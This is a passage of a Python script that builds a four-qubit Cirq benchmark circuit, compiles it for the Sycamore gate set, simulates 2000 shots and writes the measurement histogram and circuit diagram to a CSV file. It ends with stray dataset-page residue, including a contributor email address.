    c.append(cirq.X.on(input_qubit[3])) # number=28
    # circuit end

    # measure all qubits together; results are read back under key 'result'
    c.append(cirq.measure(*input_qubit, key='result'))
    return c
def bitstring(bits):
    """Collapse an iterable of bit-like values into a compact '0'/'1' string."""
    digits = [str(int(bit)) for bit in bits]
    return ''.join(digits)
if __name__ == '__main__':
    # Simulate the benchmark circuit and dump the measurement histogram,
    # circuit length, and circuit diagram to a CSV under ../data/.
    qubit_count = 4
    input_qubits = [cirq.GridQubit(i, 0) for i in range(qubit_count)]
    circuit = make_circuit(qubit_count,input_qubits)
    # compile for Google's Sycamore device using the sqrt-iSWAP gate set
    circuit = cg.optimized_for_sycamore(circuit, optimizer_type='sqrt_iswap')

    circuit_sample_count =2000
    simulator = cirq.Simulator()
    result = simulator.run(circuit, repetitions=circuit_sample_count)

    # histogram of measured bitstrings, keyed by the 'result' measurement
    frequencies = result.histogram(key='result', fold_func=bitstring)
    writefile = open("../data/startCirq1993.csv","w+")
    print(format(frequencies),file=writefile)
    print("results end", file=writefile)
    print(circuit.__len__(), file=writefile)
    print(circuit,file=writefile)
    # NOTE(review): consider "with open(...)" so the file closes on error
    writefile.close()
"wangjiyuan123@yeah.net"
] | wangjiyuan123@yeah.net |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.